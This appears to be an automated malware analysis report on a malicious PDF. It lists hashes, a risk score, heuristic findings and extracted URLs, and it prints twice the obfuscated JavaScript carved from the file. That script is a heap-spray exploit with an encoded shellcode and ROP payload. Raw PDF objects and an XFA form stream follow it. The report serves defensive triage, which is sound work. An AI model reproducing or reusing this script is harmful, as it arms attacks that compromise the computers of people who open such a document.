Malicious PDF — malware analysis report

Static analysis result for SHA-256 9e74a262a9502d97…

MALICIOUS

PDF

53.4 KB · First seen: 2026-05-11
MD5: cdda66af601166bfe64edb26faa85ac6
SHA-1: ec79fa1b9fcb498c7264cb55ec1ecea409190753
SHA-256: 9e74a262a9502d97e850f6d0be86a64214b1605f5b6dd2ec3fa197c54af01c0c
Risk score: 76

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (5)

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture (XFA); XFA forms can contain script logic.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://www.bitstream.com — in PDF document text
    • http://ns.adobe.com/xdp/ — referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/ — referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/ — referenced by PDF JavaScript

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3678 bytes
SHA-256: 01a5abc81f56eebfc76fcab7f4fb8a210d1641e74d1385a6c6723e917a7a7921
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var TNhBPyppNigTiKI = unescape;
var TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT = TNhBPyppNigTiKI( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%u9ebf%u483f%udbcf%ud9cb%u2474%u5af4%uea83%u31fc%u0c7a%u7a03%u7c0c%ub4ca%u0927%u4535%u69b8%ua0bf%ubb89%ua1db%u0bb8%ue4af%ue030%u1cfd%u84c2%u1229%u2263%u1d0c%u8374%uf190%u82b6%u086c%u64eb%uc34c%u65fe%u3e89%u37f0%u3442%ua7a3%u08e7%uc678%u0727%ub0c0%ud842%u0ab5%u094c%u0165%ub106%u4d0d%uc0b7%u8ec2%u8b8b%u646f%u0a7f%ub5a6%u3c80%u1986%uf0bf%u600b%u3787%u17f4%u4bf3%u2f89%u36c0%uba55%u91d5%u1c1e%u233e%ufaf2%u2fb5%u89bf%u3392%u5e3e%u48a9%u61cb%ud97e%u458f%u815a%ue454%u6ffb%u193a%ud71b%ubfe3%ufa57%ub9f0%u9335%uf735%u63c5%u8052%u51b6%u3afd%uda51%ue476%u1da6%u50ad%ue038%ua04e%u2710%uf01a%u8e0a%u9b23%u2fca%u0bf6%u9f9b%ueba9%u604b%u831a%u6f81%ub345%ua5a9%u59ee%u2e53%u35d1%u865b%u47b9%uc75c%uce65%u8dba%u8685%u3a15%u833f%udbee%u1ec0%udc8b%uac4b%u926b%ud9bb%u437f%u944c%uc222%u0353%ueb48%uafc1%ubcdb%uad7d%u8a3a%u4e21%u8069%udae8%uffd2%u0a14%uffd3%u4042%u97d3%u3032%u8280%ued3c%u1eb4%u0da9%uf3ed%u657a%u2d1
3%u2a4c%u18ec%u174c%u653b%u61ca%u8549%u4116' );
var reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD = TNhBPyppNigTiKI( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.length + 20 + 8 < 65536) reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD+=reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK = reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.substring(0, (0x0c0c-0x24)/2);
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
wEFbWkDcjXZgGINgdfgfGGlr = AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK.substring(0, 65536/2);
while(wEFbWkDcjXZgGINgdfgfGGlr.length < 0x80000) wEFbWkDcjXZgGINgdfgfGGlr += wEFbWkDcjXZgGINgdfgfGGlr;
DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu = wEFbWkDcjXZgGINgdfgfGGlr.substring(0, 0x80000 - (0x1020-0x08) / 2);
var pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg = new Array();
for (rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb=0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb<0x1f0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb++) pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg[rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb]=DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4564 bytes
SHA-256: bb97093eb02e4c7fe5a5204fe7ca9d4d0ee33d1ed6e9fadf85518debc41c9e73
Preview script
First 1,000 lines of the extracted script
var TNhBPyppNigTiKI = unescape;
var TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT = TNhBPyppNigTiKI( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%u9ebf%u483f%udbcf%ud9cb%u2474%u5af4%uea83%u31fc%u0c7a%u7a03%u7c0c%ub4ca%u0927%u4535%u69b8%ua0bf%ubb89%ua1db%u0bb8%ue4af%ue030%u1cfd%u84c2%u1229%u2263%u1d0c%u8374%uf190%u82b6%u086c%u64eb%uc34c%u65fe%u3e89%u37f0%u3442%ua7a3%u08e7%uc678%u0727%ub0c0%ud842%u0ab5%u094c%u0165%ub106%u4d0d%uc0b7%u8ec2%u8b8b%u646f%u0a7f%ub5a6%u3c80%u1986%uf0bf%u600b%u3787%u17f4%u4bf3%u2f89%u36c0%uba55%u91d5%u1c1e%u233e%ufaf2%u2fb5%u89bf%u3392%u5e3e%u48a9%u61cb%ud97e%u458f%u815a%ue454%u6ffb%u193a%ud71b%ubfe3%ufa57%ub9f0%u9335%uf735%u63c5%u8052%u51b6%u3afd%uda51%ue476%u1da6%u50ad%ue038%ua04e%u2710%uf01a%u8e0a%u9b23%u2fca%u0bf6%u9f9b%ueba9%u604b%u831a%u6f81%ub345%ua5a9%u59ee%u2e53%u35d1%u865b%u47b9%uc75c%uce65%u8dba%u8685%u3a15%u833f%udbee%u1ec0%udc8b%uac4b%u926b%ud9bb%u437f%u944c%uc222%u0353%ueb48%uafc1%ubcdb%uad7d%u8a3a%u4e21%u8069%udae8%uffd2%u0a14%uffd3%u4042%u97d3%u3032%u8280%ued3c%u1eb4%u0da9%uf3ed%u657a%u2d1
3%u2a4c%u18ec%u174c%u653b%u61ca%u8549%u4116' );
var reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD = TNhBPyppNigTiKI( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.length + 20 + 8 < 65536) reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD+=reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK = reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.substring(0, (0x0c0c-0x24)/2);
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
wEFbWkDcjXZgGINgdfgfGGlr = AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK.substring(0, 65536/2);
while(wEFbWkDcjXZgGINgdfgfGGlr.length < 0x80000) wEFbWkDcjXZgGINgdfgfGGlr += wEFbWkDcjXZgGINgdfgfGGlr;
DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu = wEFbWkDcjXZgGINgdfgfGGlr.substring(0, 0x80000 - (0x1020-0x08) / 2);
var pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg = new Array();
for (rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb=0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb<0x1f0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb++) pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg[rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb]=DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053844 00000 n
0000053877 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54363
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: 076f5d08d54075a696ecd7eeb7f597aa8c84c22bc13d2d943beebbfd7e4afdd9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C